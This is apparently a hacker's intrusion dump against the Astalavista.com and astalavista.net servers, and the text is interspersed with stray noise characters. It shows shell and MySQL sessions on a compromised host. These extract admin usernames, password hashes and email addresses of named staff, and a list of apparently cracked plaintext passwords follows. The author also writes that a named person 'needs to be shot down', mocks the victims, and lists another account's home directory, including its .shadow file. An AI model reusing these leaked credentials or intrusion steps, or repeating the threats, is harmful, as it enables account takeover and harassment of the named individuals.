. z$ p. v5 X& |7 G <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>! z' d0 y6 z! W! Z4 g- W* b- ]
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
- B- ]. q6 R" k* i& a: l& M <generator>Astalavista.com</generator>0 \5 ~& C1 [9 P- M* | O9 e3 o3 H
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
4 e& h/ g& V9 Z$ Y- l </channel>
, H$ }# l. x2 w9 T</rss>’;
& A n6 S% B* C, N: m8 m! W+ z/ _2 N9 T8 |" v+ j
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
# e, o# j9 @9 H- f0 R2 J4 o unlink (FULLPATH . ‘/feed/exploits.xml’);
* M8 M6 P6 y) ?4 @ }
) Y" j6 A/ Y( ~8 B1 M5 @7 M* T+ U7 Z1 G; k+ v5 F
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
8 \' H5 O, T( ~1 y[snip]
8 X- ^, x, w/ x0 E2 T* u4 k/ o
1 Q( L( p" [% A+ R/ @sh-3.2$ cat exploits.sh
: a: Y5 S5 P& v. x, l+ a#!/bin/sh
8 F9 T% M% `& f$ o( _" O% P
3 i& y: q3 D( {2 d* e) Y+ _3 j' _###########################################################2 @5 I- |6 a- |0 U; f
# #
' r7 B- I4 ]2 _: A# v# Title: milw0rm exploits adder #( l8 Y1 }4 @* u; k* ?
# Description: Add all milw0rm exploits to the #! ]! c. c6 A3 I9 k, Q7 ^5 q8 v
# Astalavista.com database #
+ t% ^7 w. |6 W* E7 K& C$ k" t/ h# #
4 t% ^+ c; a) v" I* u( b Z# Company: Astalavista Group #
$ N' }$ Y4 e1 A5 n' y# M# Author: Paulo M. Santos #' C& z* S; g# H
# E-Mail: 链接标记paulo.santos@astalavista.ch #
$ C. V- S, n" W! G; l# #( I" J5 J1 U. }& b
###########################################################5 |8 p3 o+ j, I4 F+ p- F! m) T( Q
( m; d8 w$ P7 t/ s( v- ?8 ]# path
; c( R7 Y& e: U) H& y( Cthis_path=/home/com/public_html/modifications/cronjobs
; w: z2 k6 b& d% r9 F& c7 v( a" \$ h6 C7 C7 I8 Z
# change directory; G9 Y k5 P, j! ?2 H- D# `& _
cd $this_path
1 H6 R- T0 e8 e3 D# ]7 |% {7 Rcd tmp/" b% a6 x3 ^ Z
' _; a- _ g- E
# delete files
4 A1 R; h+ X0 d: v i, z; Rrm -rf milw0rm.tar.* &: [2 f' [* m* C+ M4 ~/ b! K0 i B1 K
rm -rf milw0rm/ &: Y% N1 R7 w) J0 `4 B3 V# f
' D6 I6 Q! M! k9 T# wget milw0rm paket
( y0 s; }* v; Z [! {wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
, `% [0 f0 x# I7 ]7 ~
5 s8 D, j% J0 H+ u o6 Z9 z; C# extract milw0rm paket
) a* H, Y6 u3 m9 }( E# L# wtar -xvf milw0rm.tar.bz2( k- r# z& s A! w; [9 Q
# J; u, Q$ e* ?5 v3 v
# change owner
+ z4 S0 _* I! |3 X# g) D' Ychown -R com .
1 G g$ P# A1 m! Ychgrp -R com .
+ M+ j& D+ V4 E: X
6 o5 j- {. m$ x6 m7 Y9 Y# execute php script- D4 H! `. ` s+ v0 \& A4 @
cd $this_path1 Q) W9 j& a7 v- K
php -q exploits.php
8 L& f4 o" z+ U+ x+ H3 h
9 k5 \: I. M1 |! l4 d- k9 S8 G# delete files
0 Y- t! U% u' D+ P' W( _rm -rf tmp/milw0rm.tar.*
' a8 T7 }0 \% I1 u9 y, C* T1 {rm -rf tmp/milw0rm/5 R& ~' U! z4 ^! Z: n$ S/ M" S0 \
3 x K! X1 s. @, X1 lsh-3.2$ echo “Paulo M. Santos needs to be shot down.”' E6 U( q) p* m) n& H! ]
Paulo M. Santos needs to be shot down.
7 Z2 |! t/ `& `3 Z& Y! x3 e! U8 n
mysql -u contrexxuser2 -p; Z; S9 p( w; p( O
Enter password:! y; J3 m2 V4 b, h3 {5 [
Welcome to the MySQL monitor. Commands end with ; or \g./ @/ U) u5 I: ?4 P
Your MySQL connection id is 261694
9 J( V* R x5 X) |- B- DServer version: 5.0.45-community-log MySQL Community Edition (GPL)1 w+ w. @# d4 P
8 s/ ?2 i3 y# Q& X _/ D; ^! C6 ~6 ^
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: i( K5 Q% b p/ P- c! F
3 y' \2 R4 Q2 T0 k8 j$ @' l( nmysql> show databases;
" a* S/ `2 Y" E7 c8 L# C9 ]+——————–+- o$ O* D- C5 Z% _- ~/ i- s4 o% j: i& h
| Database |% A& M/ I$ Z& q' ^( q |0 ^/ w s
+——————–+
3 R" f1 i5 x: s% L0 i1 F7 S| information_schema |
6 u! [1 s2 g0 @& p2 C| com_contrexx2 |5 t& o- b9 ?8 w, T8 w
| com_contrexx2_live |; Q( [+ `! M7 ]! Q2 ?& e: z3 J x3 Z8 l
| test |
4 g( f t$ [& }: S+——————–+" k* @; I8 v G. G2 Z& r. {
4 rows in set (0.00 sec)% z* J; W5 U' y% t- R0 K+ y6 s
4 Y" H( t0 `5 i/ u5 X( ?2 L5 x
mysql> use com_contrexx2_live
! c; Y& r4 x% o3 M2 \" dDatabase changed
Y- L, ^8 _( V2 n& R# `) i X0 \mysql> show tables;
$ X( e! Z+ Z8 x! @+————————————————–+' r9 ^* m W4 L( F ~2 ~" Y2 U
| Tables_in_com_contrexx2_live |
6 }$ E3 u8 c! s/ ]+————————————————–+
4 \. N$ n% x3 `3 C" E| cc_banner_counter |6 g3 n- u$ \( [& Z( q( ^ A3 b
| cc_search_counter |
7 V9 { n3 z5 z7 ~9 r| contrexx_access_group_dynamic_ids |
% ~8 t' o V' p| contrexx_access_group_static_ids |8 ~( x: v; }" y6 l; W) Z1 C
| contrexx_access_rel_user_group |6 M! U" c% k V( ^% G( y" _
| contrexx_access_settings |3 q! r. N% ]" i( S
| contrexx_access_user_attribute |
: D; H4 ~, j( c, k3 Z| contrexx_access_user_attribute_name |- Q- K: F& }# |0 F k
| contrexx_access_user_attribute_value |
" @6 p3 T' | r" W: d| contrexx_access_user_core_attribute |
" e& l. v- f6 V0 _| contrexx_access_user_groups |
# K( U# ^% ~7 z3 ]# W$ t+ L; O| contrexx_access_user_mail |7 j$ B8 Z% u% \
| contrexx_access_user_profile |7 C' k% g; _! C# S
| contrexx_access_user_title |
3 d6 e0 E q0 z% D% a| contrexx_access_user_validity |: {& z2 X8 V1 F/ f5 g5 k
| contrexx_access_users |
3 j% }: T& m( z8 |0 N| contrexx_backend_areas |
' [) Z0 S$ o1 N! m4 c# _5 G" O: I' N| contrexx_backups |. G8 d6 ]0 k( ?+ Y) S
| contrexx_content |* b! m) F- O( E$ l- S, S% V% N: K: R
| contrexx_content_history |
/ }6 L, a+ ?2 l% Y9 D$ S$ ~! ~; U| contrexx_content_logfile |0 b: I! ^- ?+ t+ r+ A) w( a& g2 }4 b
| contrexx_content_navigation |
7 d7 |) p2 f, ^6 U/ z9 g* @- d: X| contrexx_content_navigation_history |3 n H5 H$ y$ a$ a; x
| contrexx_ids |# w. f, X" k! w3 p. V5 \; p
| contrexx_languages |3 O5 t% z0 `6 ^" v, }
| contrexx_lib_country |7 n1 a$ B2 f: ^# I7 @3 T: O- u5 w
| contrexx_log |
( } K! a" m" a| contrexx_module_alias_source |
& h& J- f8 r3 R: ?7 ^; K| contrexx_module_alias_target |) v: t) V+ i M6 W
| contrexx_module_block_blocks |+ Z7 Z) T. u$ L/ F0 t8 R h
| contrexx_module_block_rel_lang |
; P) L! T6 I* [/ l; w| contrexx_module_block_rel_pages |+ v8 ~3 [. R. l% z, M
| contrexx_module_block_settings |
# h" z t" a Q: c8 \1 w! w% r| contrexx_module_blog_categories |8 A" x! V- h* R4 o, y# Q
| contrexx_module_blog_comments | p2 L' C' ]" [1 a/ j
| contrexx_module_blog_message_to_category |! O' b' {: m$ y7 w7 M1 X
| contrexx_module_blog_messages |
% S& n+ b+ S7 s! T4 r6 e( R| contrexx_module_blog_messages_lang |
: x; P" Z' ^/ z9 ~$ }/ h# q m2 y| contrexx_module_blog_networks |
) |% \( f# H0 E0 X3 f9 D| contrexx_module_blog_networks_lang |8 m( `2 V1 y9 J) c0 p: d% d% A
| contrexx_module_blog_settings |& w; s3 K1 @0 k7 p$ Q
| contrexx_module_blog_votes |% `6 O0 ~( y; C6 K( K- C- i, x
| contrexx_module_calendar |; T# [/ B% ^0 W' }) O7 C
| contrexx_module_calendar_access |
1 x' X7 [* }( u: [" C| contrexx_module_calendar_categories |
5 E* P& e8 c3 \, C| contrexx_module_calendar_form_data |
7 f, H9 U X- d2 T/ Q) {3 u| contrexx_module_calendar_form_fields |, U) Q# |& }$ L1 T9 K9 U
| contrexx_module_calendar_registrations |) D& K- K ~ b6 B" M
| contrexx_module_calendar_settings |$ a3 U% Q. n) K
| contrexx_module_calendar_style |/ C5 c$ U2 e; j7 p, ~/ p
| contrexx_module_contact_form |
3 e& H, E& z) B+ F9 \| contrexx_module_contact_form_data |$ D: k6 O! d! I3 W8 C+ H
| contrexx_module_contact_form_field |$ B' v" b% l, e- R
| contrexx_module_contact_settings |% W) u0 l. d2 N# T' g0 `
| contrexx_module_data_categories |
- ?7 m: L, w! {$ ]9 D) s3 N| contrexx_module_data_message_to_category |
' K/ {4 J3 [' p2 v) e5 Y0 d) @| contrexx_module_data_messages |! h @9 D8 B: V5 J/ P, g
| contrexx_module_data_messages_lang |6 K$ A8 {8 N1 o( t
| contrexx_module_data_placeholders |
1 K9 V- ?( y; ~7 O| contrexx_module_data_settings |
& u o5 p/ {& u0 x' o6 ]| contrexx_module_directory_access |
J8 s3 M, k& z/ l7 o: o7 N2 j| contrexx_module_directory_categories |
$ @( R% U6 \0 P" y9 I| contrexx_module_directory_dir |' R' u, M( e+ T$ g: w2 a1 w* _# K
| contrexx_module_directory_inputfields |- b% |* @1 W5 D$ }7 n; [
| contrexx_module_directory_levels |
n8 M8 c/ O+ d& ~, `! K* F- {| contrexx_module_directory_mail |" q- T @$ D) K( b6 V
| contrexx_module_directory_rel_dir_cat |3 [( i7 E N5 }' ]' k9 o( G' I9 H
| contrexx_module_directory_rel_dir_level |! T) g: H; Q% ?* T7 h5 n* ^
| contrexx_module_directory_settings |! J: {0 n- P# x7 @ J$ b" Y
| contrexx_module_directory_settings_google |
! T6 @( z0 j; G) v0 s+ a; t| contrexx_module_directory_vote |
% s! n0 A! v" e% i| contrexx_module_docsys |' z! N" s. V# a1 H" M
| contrexx_module_docsys_categories |
/ V1 g2 f5 ~1 o9 k| contrexx_module_egov_configuration |
+ N; ]% m! I+ J$ Q$ ^| contrexx_module_egov_orders |
* b7 E; J' B! y3 @$ X0 o1 S0 P% X| contrexx_module_egov_product_calendar |( s$ X4 f3 `1 d) t! x% N) i4 k
| contrexx_module_egov_product_fields |6 z/ {' P( C0 B+ y
| contrexx_module_egov_products |6 V& v4 V0 L7 W4 k/ V' R
| contrexx_module_egov_settings |
% g9 w9 i' f& c9 S' l| contrexx_module_exploits |. N$ o; m9 F, Q3 o6 G( b5 s _
| contrexx_module_exploits_categories |
$ @6 @- E$ t% Y9 B/ ]| contrexx_module_feed_category |
* n- T# [; R: m) p& ]( N| contrexx_module_feed_news |
. q* g9 ~0 N. }6 Y' ~& ` }- E| contrexx_module_feed_newsml_association |* e3 p; P1 |( L+ ?9 K/ l0 A. I
| contrexx_module_feed_newsml_categories |7 C5 a: T/ r; C* q/ }, A3 H
| contrexx_module_feed_newsml_documents |
! N! @/ J6 t+ J- I: x| contrexx_module_feed_newsml_providers |& k% e/ I7 @, n2 U' i
| contrexx_module_forum_access |
6 C5 s% F4 J: G! ~| contrexx_module_forum_categories |
9 z! |# H! ~8 ?* `& t$ ]3 R| contrexx_module_forum_categories_lang |4 \7 V' `1 A& Z" d, g+ z1 g
| contrexx_module_forum_notification | H9 D1 \4 J) v; k0 t
| contrexx_module_forum_postings |
9 P; T3 ^. I! ^% f# Y| contrexx_module_forum_rating |
# G# \7 K" V) u' t# k8 @& t| contrexx_module_forum_settings |- F: g) b* v% z% v# ^) o
| contrexx_module_forum_statistics |) l$ F$ M/ v2 P! r! s9 o S
| contrexx_module_gallery_categories |5 D. _9 ]1 E- r8 _5 q% y
| contrexx_module_gallery_comments |
) l' M$ G# c- B6 n# C| contrexx_module_gallery_language |
: ?, x# n" C. _6 _/ g a| contrexx_module_gallery_language_pics |$ j" K' {" H% T
| contrexx_module_gallery_pictures |
8 t; D' J3 Q, l: z' A| contrexx_module_gallery_settings |
8 Z4 @5 h. M- L& s; e; t| contrexx_module_gallery_votes |0 `5 Q9 }" w5 o/ g, `5 x& U3 ~3 V
| contrexx_module_guestbook |' b% m; g% G0 Y6 Z/ t
| contrexx_module_guestbook_settings |" X. L/ c* ?& o$ z7 b8 |* H9 a- }
| contrexx_module_livecam |
% y4 N4 O6 X* i. y7 F| contrexx_module_livecam_settings |! v3 `; f8 w! ~ Q$ K* y* K; l R/ g
| contrexx_module_market |+ s9 v, i8 F- y/ E6 c
| contrexx_module_market_access |4 i3 N& x1 `" Z0 f, T# M8 L% c
| contrexx_module_market_categories |% @2 c( X& z: S4 c7 f [8 @- ~1 D
| contrexx_module_market_mail |
4 B, M: U$ h2 X) R e& M N| contrexx_module_market_paypal |/ z$ d7 e$ g+ K. [% D' ~
| contrexx_module_market_settings |
9 l6 F7 k! O4 a8 L3 t( Q$ Q| contrexx_module_market_spez_fields |# k4 j" A% @2 p
| contrexx_module_mediadir_access |
0 ]. B i( d [. A& r| contrexx_module_mediadir_categories |5 P2 I6 p. w0 g+ S; w& D
| contrexx_module_mediadir_comments |
3 X% b) N+ S( W0 Z- |; C| contrexx_module_mediadir_dir |
2 c$ b) F# `# I| contrexx_module_mediadir_inputfields |0 H/ t: o1 x1 N
| contrexx_module_mediadir_levels |! V B/ ^" E2 I2 h
| contrexx_module_mediadir_mail |3 `) j, R6 ^- x6 s _7 i. ]1 c
| contrexx_module_mediadir_rel_dir_cat |; @8 A3 i* l2 t) ~ \
| contrexx_module_mediadir_rel_dir_level |
; P3 i& V) i+ V; M6 f5 C; O| contrexx_module_mediadir_reports |
3 J5 [$ L3 h" U$ @| contrexx_module_mediadir_settings |
6 {9 ?2 T7 N/ ^2 z! ]| contrexx_module_mediadir_settings_google |' i4 p: H6 T+ |; N/ y
| contrexx_module_mediadir_vote | C5 \7 o6 S5 B; b; f
| contrexx_module_memberdir_directories |; x5 p- b# a' V/ e
| contrexx_module_memberdir_name |
# i) s" p. |, T4 n0 D- _| contrexx_module_memberdir_settings |
- G+ C8 y8 T# p9 k0 U) t" f| contrexx_module_memberdir_values |
0 Q( N, v0 N* E6 v3 ]9 d| contrexx_module_nettools_allowed_groups |
) j* X0 |3 s, s9 l1 C! [4 Q2 r| contrexx_module_nettools_settings |
4 Z! _ Q2 m5 w& y) d| contrexx_module_news |
5 W! o1 ~3 e4 R. N9 X! o( O1 _| contrexx_module_news_access |
) U" ]& [1 X, _5 v6 v/ S| contrexx_module_news_categories |
3 c# A- B/ b0 W+ X7 u| contrexx_module_news_settings |3 G6 z! f- S, h2 f0 ?: m/ J4 Y! N
| contrexx_module_news_teaser_frame |
; R7 E% V# ^& ]% d; b| contrexx_module_news_teaser_frame_templates |
% z1 ^$ d4 r6 ^; @| contrexx_module_news_ticker |
3 l5 p' o2 m; \( y- M, F| contrexx_module_newsletter |
! j ^6 ?2 k0 {2 V5 o* u+ }7 O| contrexx_module_newsletter_attachment |2 i9 }' K& y# V2 k0 b: E
| contrexx_module_newsletter_category |
: C5 B- t2 w1 c5 N3 O| contrexx_module_newsletter_confirm_mail |& k$ o9 N7 X( j4 y
| contrexx_module_newsletter_rel_cat_news |2 z g7 S: \! t
| contrexx_module_newsletter_rel_user_cat |
$ V4 M0 m6 p" s2 m x! ?| contrexx_module_newsletter_settings |8 ?% [" W+ I7 I$ ]0 h& H
| contrexx_module_newsletter_template |* _) N2 y2 ?/ y7 r2 f
| contrexx_module_newsletter_tmp_sending |
. d' B/ A5 P: ~: X' p8 d \, {, t| contrexx_module_newsletter_user |0 @2 D3 d3 r% k* i, t* u2 a# ^
| contrexx_module_newsletter_user_title |
5 y9 N- o% p& G- e| contrexx_module_onlinetools_defaultports |
* k& F% q. k6 A! L2 n/ Y| contrexx_module_onlinetools_defaultports_back |
& D5 q o# C0 O3 Q, [| contrexx_module_onlinetools_geolitecity_blocks |
3 m a8 ?- J M: g/ q| contrexx_module_onlinetools_geolitecity_country |
( }; C _4 h, M: y8 y. A2 c| contrexx_module_onlinetools_geolitecity_location |
, _! S! C" H: r* J8 A. f| contrexx_module_podcast_category |
: z8 d8 g( ^4 c& b! K( o# ^| contrexx_module_podcast_medium |3 d5 n# h, w# Y& r& s- i* {) s9 @
| contrexx_module_podcast_rel_category_lang |
5 D! F1 a. f( D| contrexx_module_podcast_rel_medium_category |: E5 p h6 L* u6 O5 c4 Y
| contrexx_module_podcast_settings |) Y1 n P) f, }/ ~ U9 }; k1 w
| contrexx_module_podcast_template |
A ^1 v+ n! p \/ x| contrexx_module_proxydb |2 t% V% n: \' J: O# o
| contrexx_module_recommend |
|: y5 C( k G j' i$ _; `8 O6 h| contrexx_module_repository |0 n; H3 ~& F) N8 Z6 P
| contrexx_module_securitynews_cats |( x7 u0 r# s) `8 S) l1 y: Q* L+ I
| contrexx_module_securitynews_feeds |; f5 M, R! F8 X3 C. N
| contrexx_module_securitynews_news |
( f5 ]" i, }# z4 m7 L| contrexx_module_shop_categories |
4 ]7 N ~+ f: v8 U6 ~" A| contrexx_module_shop_config |4 O8 N; T" a. @1 x
| contrexx_module_shop_countries |1 |) V7 F2 |2 i; x. f. q% i
| contrexx_module_shop_currencies |
" P3 x( g! s" i1 B4 @* H| contrexx_module_shop_customers |
) ?' ~+ ?8 j' V/ F1 G/ w| contrexx_module_shop_importimg |
8 P" B ]7 `6 o+ t9 _9 F| contrexx_module_shop_lsv |
/ o% `) ]. `. Y0 x8 |" K5 |% x2 T7 y| contrexx_module_shop_mail |
* o1 a# m% Q; C) C* H% e+ q& [7 Z| contrexx_module_shop_mail_content |, w. X% I; y2 y4 @2 x! Y0 @
| contrexx_module_shop_manufacturer |
! |$ F- h# C& W2 I! f| contrexx_module_shop_order_items |
; L+ v4 ]2 V" q- O| contrexx_module_shop_order_items_attributes |
5 P5 C. P. t& e$ B! g' K| contrexx_module_shop_orders |. t: {7 J" C& ~, T; v Z' C& p
| contrexx_module_shop_payment |
( ?" N4 X, z6 X R| contrexx_module_shop_payment_processors |; ~! N r% Y' V. N F( E. F
| contrexx_module_shop_pricelists |
' U! I( s1 ]& s| contrexx_module_shop_products |0 W; u ~9 Z- W( M4 s2 X! J% m
| contrexx_module_shop_products_attributes |5 X& ?7 A) N$ l: ]. g K. F
| contrexx_module_shop_products_attributes_name |+ c* V8 k; |" w# b2 V/ \9 }" i
| contrexx_module_shop_products_attributes_value | w1 c4 S/ v5 ?# j2 }
| contrexx_module_shop_products_downloads |
& k. D1 E0 Y1 T| contrexx_module_shop_rel_countries |7 Q3 \! Q+ ]) u
| contrexx_module_shop_rel_payment |
( n$ \$ j: h1 j7 Y+ J3 u| contrexx_module_shop_rel_shipment |4 l) Z: k) ?* t* e
| contrexx_module_shop_shipment_cost |- q% T5 \7 L/ w5 l; B
| contrexx_module_shop_shipper |
# P+ j. Q5 ~, p! P: a6 t+ Q| contrexx_module_shop_vat |
6 F# S( Y! ^3 ?2 |# E| contrexx_module_shop_zones |
' Q5 ~* o3 b' v& d1 K# H8 ^8 E3 {| contrexx_module_u2u_address_list |
) r$ l& V/ z: ?7 a| contrexx_module_u2u_message_log |
n0 C: g4 H S- s( b8 ]| contrexx_module_u2u_sent_messages |7 T/ u5 @0 N* z7 b: z/ _3 O
| contrexx_module_u2u_settings |4 Y& R9 n8 i' P4 R* E" V& G
| contrexx_module_u2u_user_log |7 h0 y( E3 j. s8 S: G8 N# P
| contrexx_modules |, `7 D, e" y8 R0 T; W
| contrexx_sessions |
- x5 y1 ]% Q+ E7 ^) C| contrexx_settings |; Q3 {/ X# d+ d d3 O
| contrexx_settings_smtp |2 }- Z! z8 A$ M( U' j9 I
| contrexx_skins |9 t7 T' O3 h$ A9 @: R1 ]
| contrexx_stats_browser | u- s5 f. a* {% [
| contrexx_stats_colourdepth |- i, z! i* B d. L
| contrexx_stats_config |
5 U+ C7 O, |2 |3 N$ S) S& B, r| contrexx_stats_country |8 {' `: w5 N- x# {3 |# k6 e$ w
| contrexx_stats_hostname |0 @6 r) o A0 H! n4 Q F
| contrexx_stats_javascript |
- [- `0 g. T, I2 [3 H3 E3 G1 d| contrexx_stats_operatingsystem |
$ y, K+ D" t& q1 K2 S9 X| contrexx_stats_referer |
# ~0 L B i D: F| contrexx_stats_requests |- u3 h) Z4 G$ M- v2 A t
| contrexx_stats_requests_summary |! z6 T0 V: {& q' z" @
| contrexx_stats_screenresolution |4 ]$ V+ V3 W, R6 L& F
| contrexx_stats_search |) Q, m; T: s o
| contrexx_stats_spiders |
2 D7 V3 w @1 \6 w4 _2 L" `* M| contrexx_stats_spiders_summary |/ Z+ U2 X7 N/ [0 Y3 f
| contrexx_stats_visitors |
3 x1 _$ z* O4 W; l o% O3 D/ y| contrexx_stats_visitors_summary |- M) j- S w E1 Z, H) m( ]
| contrexx_voting_additionaldata |
( P, D8 |4 [: Z9 S1 F& }) U| contrexx_voting_email |+ G% d: i. V0 ~9 ~2 P5 n
| contrexx_voting_rel_email_system |$ R% [; J3 A' ^7 O0 w
| contrexx_voting_results |
( N+ Z. [* m9 [/ L4 k/ a| contrexx_voting_system |2 U& n* W: d9 y! Q2 ~9 b
| foo |- t/ L6 r. }. T" @& ^6 x
+————————————————–+
2 b {- ?5 \' G9 |/ W227 rows in set (0.01 sec)' r4 S# L8 s, s. b7 @
9 Z# } H1 M; gmysql> select count(*) as skids from contrexx_access_users;3 ]) A" \% K/ a0 W
+——-+
' A3 q/ r! Z3 }| skids |
4 D, s- \+ o4 W9 F) c3 H+——-+* f4 w9 l& g1 f i
| 53699 |% F& m4 W. G: \
+——-+
, A$ S& D8 T" k# j1 row in set (0.00 sec)
0 C- g6 J7 E7 _( V8 a/ u7 j: o- q. B9 Y: y* [% X$ a+ C) a8 `
mysql> describe contrexx_access_users;! }. F W0 G0 }+ s' [) K
+——————+——————————————+——+—–+————–+—————-+/ k( ]2 d$ M! m7 w' O
| Field | Type | Null | Key | Default | Extra |! ]1 V2 P( `! ~3 b9 v4 S3 l
+——————+——————————————+——+—–+————–+—————-+2 x! C0 D+ i5 L, d
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
2 j' Y$ W! N& `. O% w+ v| is_admin | tinyint(1) unsigned | NO | | 0 | |( p/ w8 ~/ m6 W: Q% O9 Y
| username | varchar(40) | YES | MUL | NULL | |) o3 C) L) L/ W. W7 N* k1 c
| password | varchar(32) | YES | | NULL | |& K. V$ b- p. U/ @- [0 H$ i4 L
| regdate | int(14) unsigned | NO | | 0 | |
* L. h9 s* y- r! N: f5 C& A, O4 e| expiration | int(14) unsigned | NO | | 0 | |% O3 ?2 C2 C2 n% Z- I
| validity | int(10) unsigned | NO | | 0 | |! P" I" Q4 r* i7 S7 Y3 A
| last_auth | int(14) unsigned | NO | | 0 | |& d# s, v. K i0 Y. D
| last_activity | int(14) unsigned | NO | | 0 | |$ L( S- V; [/ _6 J5 W1 L
| email | varchar(255) | YES | | NULL | |
2 n3 Q$ z1 s; u4 }; z; B| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |& T* J8 h( L1 y9 c) [
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
P! M/ E0 b6 }. _, [1 s* ~; b| backend_lang_id | int(2) unsigned | NO | | 0 | |
4 @+ t% b4 Z* z; a8 L. l4 Q| active | tinyint(1) | NO | | 0 | |
5 R* o' j0 D. o5 p2 V| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |1 L3 W: @* S1 t/ B) d3 h
| restore_key | varchar(32) | NO | | | |8 {- s1 @) ^1 A2 m
| restore_key_time | int(14) unsigned | NO | | 0 | |. R: N, u$ j8 o& R# M6 k1 t
| u2u_active | enum(’0′,’1′) | NO | | 1 | |7 r! o) D6 z; z
+——————+——————————————+——+—–+————–+—————-+2 K: o7 i( k+ ^* X# B& W" f7 T
18 rows in set (0.00 sec)
* K' K7 p# \! D7 K: ^+ y/ j T. T, O* g( S, t& p$ S
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
0 j% C0 J4 ]4 i2 \+————+———————————-+—————————–+/ W- K( k( t2 l
| username | password | email |9 r# U4 _* U5 z& l
+————+———————————-+—————————–+0 ]% A, M K2 U4 w' @% g# d
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |# C: z. z/ K+ Q8 W4 q+ T0 R
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
2 ]( `4 u3 M* [: v. R0 F+ ?7 p7 ]| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |. Q( N8 W& @) U# p: ^
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |: u4 b7 ]7 I4 D+ c
+————+———————————-+—————————–+8 p1 q+ U5 u- p# \4 m
4 rows in set (0.04 sec)4 d7 a- E" y! W' O6 {) S* P1 `
' I. |. h- \$ c9 `4 |
mysql> exit;/ [5 L5 H* ?4 j8 T: [" b
Bye& G; E S# f, M" l- R$ h
3 I% z" v t/ |; G: N2 l& N5 K[~] There you go, your “team of security and IT professionals” is a joke.9 X1 M a; i/ f1 f: k; I1 T- W0 r
& o, j L" L& a ^9 c8 \. B0 t+——————————+
, C+ n0 J% x# s% a! N& a% o! isystem:f82BN3+_*
) ?7 |% g- Z# uBe1er0ph0r:belerophor4astacom# q# a1 u" _/ a0 |; `- d# G2 U
prozac:asta4cms!3 u) [5 Y1 m+ \% D1 i9 E ?
commander:mpbdaagf6m
1 Y7 v6 K6 E" b2 r4 qsykadul:ak29eral% B w s1 `% P' ~- E/ j! P
+——————————+
/ e7 u, x0 s3 }9 T5 @- A' O9 H9 K( ]
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
y X/ c5 n; n) C0 B…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
/ W6 O# U5 x q) R/ _
# H- K; t+ s8 ]8 @) r: p% u[~] Lets move to astalavista.net now,
7 O& j! B$ J! o2 d: o) `) _4 ?, C; z! Q. b
From <链接标记[url]https://www.astalavista.net/[/url]>:" B; m5 O( n4 u; P
>> Everyone knows that the best defense is a good offense.
% V( ^. c5 t5 a0 g( {: }8 U>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.# I: j5 L! W$ U& Z% Q* ~ b
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.0 p8 c) W9 x$ T M8 ^
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
+ y9 O8 J8 b! ]. i& I% s" i
( Z% I, T2 g( c% ~& a" K>> Go ahead, try and hack our server . in a completely legal way!
! j" U& S. x6 [* \>> Learn by doing: We offer our members tricky tasks and challenges on an
) i# U S( }9 U, e2 y" m>> ongoing basis so you can test your knowledge and abilities. You can also
3 K) S9 e. `' {$ R5 n) s2 m>> demonstrate what you.ve mastered by taking part in regular hacker contests
5 s! m) \2 k. }4 V! O>> and war games
. `& u& M- V7 k r
6 E. ]6 Z6 K, F7 a9 e [[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
" }7 _( B; j7 q- g+ ]! {; o6 B: k' t! R6 M6 S; J
[-] Tricky task: Find home dir of astalavista.net" E* P, I0 c- I
0 C: b/ c5 e/ H2 Q! `- {
sh-3.2$ ls -la ~astanet4 u% O3 @, C: O
total 48" O& S0 A- Y" N
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
6 G1 \5 s* c' P' b2 t. x# odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, I" L3 Z; ~- B; n7 |drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
6 s+ T0 M6 I( a-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
4 _0 C3 \; N1 `" M1 \-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
9 l- q E/ o& X& V-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
/ q6 z' [4 b& B# {3 a% @-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
8 t/ l% ]( h; z* [; k9 ~: Cdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
7 w6 E4 \; S. X; F K$ [3 Hdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
k( ]6 e5 t5 v9 E; t' Pdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
$ f! s0 I Q3 c2 c4 }" i8 a, h. {- m6 o6 `lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
# b# T/ j# c: O+ v4 y) o) L-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow0 T3 t5 g! c! }- q
8 t5 B' C. f3 u; a ysh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/( Z+ V1 P' y+ a/ t' m
sh-3.2$ ls -la
: [$ |* U) Q- t0 _, dtotal 200! T: L: Y2 Z% q2 W
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
d* W* S/ V8 l) Q6 zdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
